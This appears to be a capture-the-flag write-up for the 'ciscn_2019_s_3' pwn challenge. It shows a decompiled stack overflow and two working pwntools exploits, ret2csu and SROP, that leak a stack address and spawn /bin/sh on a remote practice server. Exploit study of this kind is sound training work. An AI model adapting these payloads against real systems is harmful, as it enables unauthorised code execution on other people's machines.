
ciscn_2019_s_3

Ubuntu18


0x01


checksec

[*] '/home/zelas/Desktop/pwn/ciscn_2019_s_3/ciscn_s_3'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x400000)

IDA

vuln()

// IDA decompiler output for the vulnerable function, as shown on the page.
// Root cause: sys_read accepts up to 0x400 bytes into a 16-byte stack buffer,
// and checksec above reports no stack canary, so input past the buffer
// overwrites what follows it on the stack (both exploits below put a code
// address at offset 0x10). sys_write then echoes 0x30 bytes starting at buf,
// 0x20 bytes beyond the buffer, which leaks the adjacent stack contents.
// A corrected version would bound the read by sizeof(buf) and write back no
// more than the number of bytes actually read (v0).
signed __int64 vuln()
{
signed __int64 v0; // rax
char buf[16]; // [rsp+0h] [rbp-10h] BYREF

v0 = sys_read(0, buf, 0x400uLL); // 0x400 > sizeof(buf): stack buffer overflow
return sys_write(1u, buf, 0x30uLL); // 0x30 > sizeof(buf): stack data leak; v0 is ignored
}

0x02


现有gadget

; The binary's own "gadgets" function: it only loads rax and returns, which is
; the syscall-number setup the two exploits below rely on.
.text:00000000004004D6 gadgets         proc near
.text:00000000004004D6 ; __unwind {
.text:00000000004004D6 push rbp
.text:00000000004004D7 mov rbp, rsp
.text:00000000004004DA mov rax, 0Fh ; 0xF == 15; the SROP script below uses this address as mov_rax_sigreturn_addr
.text:00000000004004E1 retn
.text:00000000004004E1 gadgets endp ; sp-analysis failed
.text:00000000004004E1
.text:00000000004004E2 ; ---------------------------------------------------------------------------
.text:00000000004004E2 mov rax, 3Bh ; ';' //gadget1 -- 0x3B == 59 (execve); the first exploit names this address mov_rax_0x59_ret
.text:00000000004004E9 retn

现有 gadget 不足够，用 csu 里面的。

; Tail of __libc_csu_init: three register moves followed by an indirect call
; through [r12+rbx*8]. The exploit below sets r12..r15 with the pop gadget at
; 0x40059A and then returns here.
loc_400580:
mov rdx, r13 ; rdx <- r13
mov rsi, r14 ; rsi <- r14
mov edi, r15d ; edi <- r15d
call ds:(__frame_dummy_init_array_entry - 600E10h)[r12+rbx*8] ; indirect call through a pointer at r12+rbx*8
add rbx, 1 // only the lines above this one are needed
cmp rbx, rbp
jnz short loc_400580 // the jump here can be ignored
rip rax rdi rsi rdx
syscall 0x3B 0 0 0
csu edi=r13d rsi=r14=0 rdx=r15
mov_rax_0x59_ret /bin/sh+0x50 0 0
execve pop_rdi_ret
/bin/sh

r12 + rbx*8 = /bin/sh

思路：利用 ret2__libc_csu_init 构造 execve("/bin/sh", 0, 0) 来 getshell

0x03


exp

from pwn import *

context(os='linux', arch='amd64', log_level='debug')
# io = process(['./ciscn_s_3'])
io = remote('node4.buuoj.cn', 25452)
# Despite the name, 0x4004ED is the address the SROP script below calls
# vuln_addr: returning here re-runs the read/write pair, so a second payload
# can be sent after the leak.
main = 0x4004ED

# Stage 1: fill the 16-byte buf, then place `main` at offset 0x10 (the slot
# vuln() returns through), and read back the 0x30 bytes that sys_write echoes.
payload1 = b'a' * 0x10 + p64(main)
io.send(payload1)
io.recv(0x20)
# The 6 bytes after the first 0x20 echoed bytes are a stack pointer; pad to
# 8 bytes for u64. (The SROP script below reads the same leak as 8 raw bytes.)
rbp_addr = u64(io.recv(6).ljust(8, b'\x00'))
print('[+] Rbp_address -->', hex(rbp_addr))
# Distance from the leaked pointer back to buf. NOTE: 0x118 == 280, and the
# payload below spells this offset as a bare literal both ways instead of
# using this variable.
offset = 0x118
pop_rdi_ret = 0x4005a3
csu = 0x400580  # loc_400580 in the __libc_csu_init listing above
# The gadget at 0x4004E2 is `mov rax, 3Bh; retn` (see the listing above); the
# 0x59 in the name is 0x3B written in decimal, i.e. the execve syscall number.
mov_rax_0x59_ret = 0x4004E2
# NOTE(review): the SROP script below uses 0x400501 for its syscall gadget;
# presumably both addresses hold a `syscall` instruction - verify in IDA.
syscall = 0x400517
pop_rbx_rbp_r12_r13_r14_r15 = 0x40059A

# Stage 2, laid out from the start of buf:
#   0x00 "/bin/sh\0" x2        - the string rdi will point at (rbp_addr-280 == buf)
#   0x10 pop gadget            - rbx=0, rbp=0, r12=buf+0x50, r13=r14=r15=0
#   0x48 csu                   - rdx/rsi/edi <- r13/r14/r15d, then call [r12]
#   0x50 mov_rax_0x59_ret      - the slot r12 points at (rbp_addr-0x118+0x50)
#   0x58 pop_rdi_ret, 0x60 buf address, 0x68 syscall
payload2 = flat(b'/bin/sh\x00'*2, pop_rbx_rbp_r12_r13_r14_r15, 0, 0, rbp_addr - 0x118 + 0x50, 0, 0, 0, csu, mov_rax_0x59_ret, pop_rdi_ret, rbp_addr-280, syscall)
io.sendline(payload2)
io.interactive()

0x04


思路：SROP

0x05


# coding:utf8
from pwn import *

context(arch='amd64', os='linux', log_level='DEBUG') #
# context.log_level = 'debug'
# conn = process(["./ciscn_s_3"])
conn = remote('node4.buuoj.cn', 26685)
vuln_addr = 0x4004ED
# 0x4004DA is `mov rax, 0Fh; retn` from the gadgets listing above; 0xF (15) is
# the rt_sigreturn syscall number on x86-64, which is what makes SROP possible.
mov_rax_sigreturn_addr = 0x4004DA
# NOTE(review): the ret2csu script above uses 0x400517 for its syscall gadget;
# presumably both addresses hold a `syscall` instruction - verify in IDA.
syscall_addr = 0x400501

# gdb.attach(conn,'b *0x40052C')
# Stage 1: two copies of "/bin/sh\0" fill the 16-byte buf, and vuln_addr at
# offset 0x10 makes vuln() run again after it returns, so a second payload can
# be sent once the echoed stack data has been read.
payload1 = b'/bin/sh\x00' * 2 + p64(vuln_addr)
conn.send(payload1)
conn.recv(0x20)

# The 8 bytes after the first 0x20 echoed bytes are a stack pointer; buf (and
# hence "/bin/sh") lies 280 (== 0x118) bytes below it. The ret2csu script
# above takes the same leak as 6 bytes plus zero padding.
bin_sh_addr = u64(conn.recv(8)) - 280
print(hex(bin_sh_addr))

# Forged signal frame: once rt_sigreturn restores it, the registers hold the
# arguments for execve(bin_sh_addr, 0, 0) and rip points at a syscall
# instruction.
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = bin_sh_addr
frame.rsi = 0
frame.rdx = 0
# frame.rsp = bin_sh_addr
frame.rip = syscall_addr

# Stage 2: buf again, then at offset 0x10 the gadget that sets rax = 15, the
# syscall instruction that executes rt_sigreturn, and the frame it restores.
# payload2 = b'/bin/sh\x00' * 2 + p64(mov_rax_sigreturn_addr) + p64(syscall_addr) + str(frame)
payload2 = flat(b'/bin/sh\x00'*2, mov_rax_sigreturn_addr, syscall_addr, frame)
conn.send(payload2)

conn.interactive()

